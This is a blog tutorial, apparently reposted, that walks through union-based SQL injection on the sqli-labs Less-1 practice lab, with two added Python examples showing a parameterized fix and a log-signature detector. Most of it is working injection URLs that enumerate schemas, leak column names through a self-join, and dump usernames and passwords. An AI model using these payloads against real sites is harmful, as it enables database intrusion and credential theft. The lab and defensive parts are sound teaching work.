Is SQL injection hard?

Contents

A quick look at Level 1

It asks us to enter an id

First time through, so let's read the source

Some related background

Hands-on

Finding out its database and tables

Hands-on

Where do we look up column names???

Leaking column names with join ... using



This post walks through the bypass techniques on sqli-labs; I built the environment with 小皮 (phpStudy).

Problems when setting up with 小皮:

1. Use Apache, not nginx, and remember to edit db-creds.inc under sql-connections; it holds the database connection settings.

2. Don't use too new a PHP version.

SQL comments: -- and #

1. When doing SQL injection we need to comment out the rest of the query. A lot of people use --+; that is really "-- " (two dashes and a space), with the space URL-encoded as +. Your injected statement is followed by the application's own single quote, which you have to either close or comment out: --' works, and so does --+. If you go the comment route, the space after -- is mandatory.

2. When we use #, the # in a URL is there to direct the browser (an anchor, for example) and means nothing to the server. The HTTP request therefore never contains a #, so it has to be encoded as %23.

First, download the sqli-labs source from GitHub:

GitHub - Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

A quick look at Level 1

It asks us to enter an id

First time through, so let's read the source

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

Look at $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; since id is wrapped in single quotes, start by passing it a single quote and see whether it errors.

An error means there is an injection point. Happy days.

Some related background

For extracting data you can use and, or and union.

When extracting we need to know the database name, the table names, the column names and then the data.

To use a UNION you need to know how many columns the query has.

So let's run an experiment:

mysql> select * from users union select 1,2;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from users union select 1,2,3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | 2        | 3          |
+----+----------+------------+
9 rows in set (0.00 sec)

mysql>

It's easy to see that a UNION fails when the column counts don't match.

Now look at this:

mysql> select * from users order by 1 asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by username asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql> select * from users order by 2 asc;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  8 | admin    | admin      |
|  2 | Angelina | I-kill-you |
|  7 | batman   | mob!le     |
|  1 | Dumb     | Dumb       |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
+----+----------+------------+
8 rows in set (0.00 sec)

mysql>

Once you've seen that, it's clear: ORDER BY accepts a column position, so it can be used to probe how many columns the query has.

Hands-on

Checking 3 columns

When checking 4 columns
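As an added example (not part of the original post or of sqli-labs), here is the Less-1 lookup rebuilt in Python against an in-memory SQLite copy of the users table shown above, once in the concatenating form the PHP source uses and once with a validated, bound parameter. It assumes SQLite instead of MySQL (the error texts differ, but UNION and ORDER BY enforce column counts the same way, which is what the probes test); the function names and the constructed rows are mine.

```python
"""Added example, not from the original post or sqli-labs: the Less-1 lookup
rebuilt in Python against an in-memory SQLite copy of the post's users table.
Assumption: SQLite instead of MySQL. Error texts differ, but UNION and
ORDER BY enforce column counts the same way, which is what the probes test."""
import sqlite3

# Constructed copy of the rows shown in the post's mysql output.
ROWS = [
    (1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"), (4, "secure", "crappy"),
    (5, "stupid", "stupidity"), (6, "superman", "genious"),
    (7, "batman", "mob!le"), (8, "admin", "admin"),
]


def open_db():
    """Create the three-column users table in memory and load the rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_concat(conn, user_id):
    """Vulnerable form: mirrors $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1".
    The caller-controlled value becomes part of the statement text."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:  # the PHP version would print mysql_error() here
        return ("error", str(exc))


def lookup_param(conn, user_id):
    """Hardened form: check that id is an integer, then bind it.
    The statement text is constant, so quotes, comments, ORDER BY and UNION
    in the input are never parsed as SQL."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        return ("rejected", "id must be an integer")
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return ("ok", conn.execute(sql, (id_value,)).fetchall())


def probe_vulnerable(conn):
    """Replay the post's probes against the concatenating handler and
    collect what each one returns."""
    return {
        # lone quote: the literal is never closed -> syntax error (the "injection point" signal)
        "quote": lookup_concat(conn, "1'"),
        # ORDER BY n works while n <= number of columns ...
        "order_by_3": lookup_concat(conn, "1' ORDER BY 3 -- "),
        # ... and errors once n is past the last column
        "order_by_4": lookup_concat(conn, "1' ORDER BY 4 -- "),
        # UNION with the wrong column count is refused
        "union_2": lookup_concat(conn, "-1' UNION SELECT 1,2 -- "),
        # UNION with the right count appends a row the caller chose
        "union_3": lookup_concat(conn, "-1' UNION SELECT 1,2,3 -- "),
    }


if __name__ == "__main__":
    db = open_db()
    for name, outcome in probe_vulnerable(db).items():
        print(f"concat  {name:<10} -> {outcome}")
    for payload in ("1", "1'", "-1' UNION SELECT 1,2,3 -- "):
        print(f"param   {payload!r:<32} -> {lookup_param(db, payload)}")
```

The probes only "work" because the value is spliced into the statement text. With a bound parameter the whole payload is just a value compared against id, and the integer check rejects it before the query even runs, which is the fix for Less-1 regardless of which keywords a filter tries to block.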

Finding out its database and tables

mysql> select * from users union select 1,user(),3;
+----+----------------+------------+
| id | username       | password   |
+----+----------------+------------+
|  1 | Dumb           | Dumb       |
|  2 | Angelina       | I-kill-you |
|  3 | Dummy          | p@ssword   |
|  4 | secure         | crappy     |
|  5 | stupid         | stupidity  |
|  6 | superman       | genious    |
|  7 | batman         | mob!le     |
|  8 | admin          | admin      |
|  1 | root@localhost | 3          |
+----+----------------+------------+
9 rows in set (0.00 sec)


mysql> select * from users union select 1,database(),3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | security | 3          |
+----+----------+------------+
9 rows in set (0.00 sec)

mysql> select * from users union select 1,version(),3;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  1 | 5.7.26   | 3          |
+----+----------+------------+
9 rows in set (0.16 sec)

mysql>

Having seen the above you also understand the three system functions user(), database() and version(). In short: query, query, query.

Hands-on

user()

database()

version()

Where do we look up column names???

sys

information_schema

These two schemas are the ones to watch; look at the second one first.

mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |   columns
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              | database names
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_LOCKS                          |
| INNODB_TRX                            |
| INNODB_SYS_DATAFILES                  |
| INNODB_FT_CONFIG                      |
| INNODB_SYS_VIRTUAL                    |
| INNODB_CMP                            |
| INNODB_FT_BEING_DELETED               |
| INNODB_CMP_RESET                      |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMPMEM_RESET                   |
| INNODB_FT_DELETED                     |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_LOCK_WAITS                     |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_FIELDS                     |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_BUFFER_PAGE                    |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_SYS_TABLESPACES                |
| INNODB_METRICS                        |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_CMPMEM                         |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_TABLESTATS                 |
+---------------------------------------+
61 rows in set (0.00 sec)

mysql>

Next, look at SCHEMATA:

mysql> desc SCHEMATA;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    39
Current database: information_schema

+----------------------------+--------------+------+-----+---------+-------+
| Field                      | Type         | Null | Key | Default | Extra |
+----------------------------+--------------+------+-----+---------+-------+
| CATALOG_NAME               | varchar(512) | NO   |     |         |       |
| SCHEMA_NAME                | varchar(64)  | NO   |     |         |       |
| DEFAULT_CHARACTER_SET_NAME | varchar(32)  | NO   |     |         |       |
| DEFAULT_COLLATION_NAME     | varchar(32)  | NO   |     |         |       |
| SQL_PATH                   | varchar(512) | YES  |     | NULL    |       |
+----------------------------+--------------+------+-----+---------+-------+
5 rows in set (0.00 sec)


mysql> select SCHEMA_NAME  from  SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| security           |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql>

Note: once information_schema is filtered you can fall back to sys, but it only holds the database names, so you need join + using to dump the table names.

Let's query:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20table_name%20from%20information_schema.tables),3%20--+

It says the subquery returns more than 1 row.

Let me try it without the subquery.

Code:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables--+

This obviously returns the first table of the first database.

Restrict the schema name after it and it will query the security database.

Code:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

Look at the database

You can add a LIMIT to probe row by row.

Code:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1--+

That's too tedious.

Let's use the subquery again:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+

Once all the tables are out, start on the column names: change tables to columns and add an AND restricting the table name to users.

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27),3%20--+

Now you have the database name (security), the table name (users) and the column names (username, password).

Then just query as normal:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20username,password%20from%20users),3--+

 

But it complains that the operand returns more than one column.

So what then? group_concat, obviously.

Code:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,password)%20from%20users),3--+

Looks a bit odd; add a separator:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(username,0x3a,password)%20from%20users),3--+

And that works.

But what if "information" is filtered? Then we call on our sys schema.

mysql> use sys;
Database changed
mysql> show tables;
+-----------------------------------------------+
| Tables_in_sys                                 |
+-----------------------------------------------+
| host_summary                                  |
| host_summary_by_file_io                       |
| host_summary_by_file_io_type                  |
| host_summary_by_stages                        |
| host_summary_by_statement_latency             |
| host_summary_by_statement_type                |
| innodb_buffer_stats_by_schema                 |
| innodb_buffer_stats_by_table                  |
| innodb_lock_waits                             |
| io_by_thread_by_latency                       |
| io_global_by_file_by_bytes                    |
| io_global_by_file_by_latency                  |
| io_global_by_wait_by_bytes                    |
| io_global_by_wait_by_latency                  |
| latest_file_io                                |
| memory_by_host_by_current_bytes               |
| memory_by_thread_by_current_bytes             |
| memory_by_user_by_current_bytes               |
| memory_global_by_current_bytes                |
| memory_global_total                           |
| metrics                                       |
| processlist                                   |
| ps_check_lost_instrumentation                 |
| schema_auto_increment_columns                 |
| schema_index_statistics                       |
| schema_object_overview                        |
| schema_redundant_indexes                      |
| schema_table_lock_waits                       |
| schema_table_statistics                       |
| schema_table_statistics_with_buffer           |
| schema_tables_with_full_table_scans           |
| schema_unused_indexes                         |
| session                                       |
| session_ssl_status                            |
| statement_analysis                            |
| statements_with_errors_or_warnings            |
| statements_with_full_table_scans              |
| statements_with_runtimes_in_95th_percentile   |
| statements_with_sorting                       |
| statements_with_temp_tables                   |
| sys_config                                    |
| user_summary                                  |
| user_summary_by_file_io                       |
| user_summary_by_file_io_type                  |
| user_summary_by_stages                        |
| user_summary_by_statement_latency             |
| user_summary_by_statement_type                |
| version                                       |
| wait_classes_global_by_avg_latency            |
| wait_classes_global_by_latency                |
| waits_by_host_by_latency                      |
| waits_by_user_by_latency                      |
| waits_global_by_latency                       |
| x$host_summary                                |
| x$host_summary_by_file_io                     |
| x$host_summary_by_file_io_type                |
| x$host_summary_by_stages                      |
| x$host_summary_by_statement_latency           |
| x$host_summary_by_statement_type              |
| x$innodb_buffer_stats_by_schema               |
| x$innodb_buffer_stats_by_table                |
| x$innodb_lock_waits                           |
| x$io_by_thread_by_latency                     |
| x$io_global_by_file_by_bytes                  |
| x$io_global_by_file_by_latency                |
| x$io_global_by_wait_by_bytes                  |
| x$io_global_by_wait_by_latency                |
| x$latest_file_io                              |
| x$memory_by_host_by_current_bytes             |
| x$memory_by_thread_by_current_bytes           |
| x$memory_by_user_by_current_bytes             |
| x$memory_global_by_current_bytes              |
| x$memory_global_total                         |
| x$processlist                                 |
| x$ps_digest_95th_percentile_by_avg_us         |
| x$ps_digest_avg_latency_distribution          |
| x$ps_schema_table_statistics_io               |
| x$schema_flattened_keys                       |
| x$schema_index_statistics                     |
| x$schema_table_lock_waits                     |
| x$schema_table_statistics                     |
| x$schema_table_statistics_with_buffer         |
| x$schema_tables_with_full_table_scans         |
| x$session                                     |
| x$statement_analysis                          |
| x$statements_with_errors_or_warnings          |
| x$statements_with_full_table_scans            |
| x$statements_with_runtimes_in_95th_percentile |
| x$statements_with_sorting                     |
| x$statements_with_temp_tables                 |
| x$user_summary                                |
| x$user_summary_by_file_io                     |
| x$user_summary_by_file_io_type                |
| x$user_summary_by_stages                      |
| x$user_summary_by_statement_latency           |
| x$user_summary_by_statement_type              |
| x$wait_classes_global_by_avg_latency          |
| x$wait_classes_global_by_latency              |
| x$waits_by_host_by_latency                    |
| x$waits_by_user_by_latency                    |
| x$waits_global_by_latency                     |
+-----------------------------------------------+
101 rows in set (0.00 sec)

mysql>

Let's look at this auto-increment table, schema_auto_increment_columns:

mysql> desc  schema_auto_increment_columns    ;
+----------------------+------------------------+------+-----+---------+-------+
| Field                | Type                   | Null | Key | Default | Extra |
+----------------------+------------------------+------+-----+---------+-------+
| table_schema         | varchar(64)            | NO   |     |         |       |
| table_name           | varchar(64)            | NO   |     |         |       |
| column_name          | varchar(64)            | NO   |     |         |       |
| data_type            | varchar(64)            | NO   |     |         |       |
| column_type          | longtext               | NO   |     | NULL    |       |
| is_signed            | int(1)                 | NO   |     | 0       |       |
| is_unsigned          | int(1)                 | NO   |     | 0       |       |
| max_value            | bigint(21) unsigned    | YES  |     | NULL    |       |
| auto_increment       | bigint(21) unsigned    | YES  |     | NULL    |       |
| auto_increment_ratio | decimal(25,4) unsigned | YES  |     | NULL    |       |
+----------------------+------------------------+------+-----+---------+-------+
10 rows in set (0.00 sec)

Try querying the column names:

mysql> select column_name  from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+-------------+
| column_name |
+-------------+
| id          |
+-------------+
1 row in set (0.01 sec)

mysql>

Seems only one column comes back.

Adding group_concat doesn't help either:

mysql> select group_concat(column_name)  from schema_auto_increment_columns where table_schema='security' and table_name = 'users';
+---------------------------+
| group_concat(column_name) |
+---------------------------+
| id                        |
+---------------------------+
1 row in set (0.01 sec)

mysql>

So sys can't give us the column names. There's always a way, it's just harder: column-name-less injection.

Leaking column names with join ... using

Code:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b)%20as%20c%20--+

What this query does: treat users as a, join users again as b, and wrap a and b together as c to select from. The duplicate column names make that query error out, and the error reveals them.

Then use using with one column name at a time to break through:

20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id))%20as%20c%20--+

Keep going until all of them are out:

http://172.51.47.163/sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id,username,password))%20as%20c%20--+

The number in backticks refers to the column in that position:

mysql> use security ;
Database changed
mysql> select `3` from (select 1,2,3 union select*from users) as a;
+------------+
| 3          |
+------------+
| 3          |
| Dumb       |
| I-kill-you |
| p@ssword   |
| crappy     |
| stupidity  |
| genious    |
| mob!le     |
| admin      |
+------------+
9 rows in set (0.00 sec)

mysql>
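As an added example (not part of the original post), here is the log-side view of everything walked through above: a small detector that decodes the query string of web-server log lines the way the notes on --+ and %23 at the top of the post describe (+ and %20 become a space, %27 a quote, %23 a #) and then matches the decoded text against signatures for the quote/comment terminator, the ORDER BY column-count probe, UNION SELECT, information_schema and sys enumeration, group_concat mass extraction and the self-join/using column leak. The log lines, the signature names and the helper functions are mine; the request paths mirror the lab URLs in the post.

```python
"""Added example, not from the original post: a log-side detector for the
probes walked through in the post. It decodes the query string the way the
post's notes on --+ and %23 describe (+ and %20 become a space, %27 a quote,
%23 a #) and then matches injection signatures against the decoded text.
The log lines below are constructed for this example."""
import re
from urllib.parse import unquote_plus, urlsplit

# One regex per technique discussed in the post, applied to the DECODED query.
SIGNATURES = {
    "comment_terminator": re.compile(r"--\s|#"),                       # "-- " or "#"
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),     # ORDER BY n
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\b(information_schema|sys)\.\w+", re.I),
    "mass_extraction": re.compile(r"\bgroup_concat\s*\(", re.I),
    "self_join_column_leak": re.compile(r"\bjoin\s+\w+(\s+as\s+\w+)?\s+using\s*\(", re.I),
}

# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed access-log lines; the paths follow the post's lab URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Apr/2023:10:00:01 +0800] "GET /sqlilabs/Less-1/?id=1 HTTP/1.1" 200 912',
    '10.0.0.5 - - [01/Apr/2023:10:00:07 +0800] "GET /sqlilabs/Less-1/?id=1%27%20order%20by%204--+ HTTP/1.1" 200 740',
    '10.0.0.5 - - [01/Apr/2023:10:00:12 +0800] "GET /sqlilabs/Less-1/?id=1%27%20order%20by%203%23 HTTP/1.1" 200 912',
    '10.0.0.5 - - [01/Apr/2023:10:00:31 +0800] "GET /sqlilabs/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),3%20--+ HTTP/1.1" 200 980',
    '10.0.0.5 - - [01/Apr/2023:10:01:02 +0800] "GET /sqlilabs/Less-1/?id=-1%27%20union%20select%20*%20from%20(select%20*%20from%20users%20as%20a%20join%20users%20as%20b%20using(id))%20as%20c%20--+ HTTP/1.1" 200 760',
]


def decode_query(log_line):
    """Return the URL-decoded query string of a log line ('' if none).
    urlsplit drops anything after a raw '#', just as a browser never sends
    it; an encoded %23 survives and decodes to '#'."""
    m = REQUEST.search(log_line)
    if not m:
        return ""
    return unquote_plus(urlsplit(m.group(1)).query)


def classify(log_line):
    """Sorted names of the signatures that match the decoded query."""
    query = decode_query(log_line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def scan(lines):
    """(decoded query, matched signatures) for every line that matched."""
    hits = []
    for line in lines:
        matched = classify(line)
        if matched:
            hits.append((decode_query(line), matched))
    return hits


if __name__ == "__main__":
    for query, matched in scan(SAMPLE_LOG):
        print(f"{', '.join(matched):<60} {query}")
```

Decoding before matching is the point: the raw log shows `--+` and `%23`, and a signature written against the raw text would miss a payload that used `%20` or `%2d%2d` instead. Matching on the decoded query, as a WAF or the application itself sees it, catches all of the post's variants with one rule each.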


Reposted from blog.csdn.net/Jack_chao_/article/details/129855018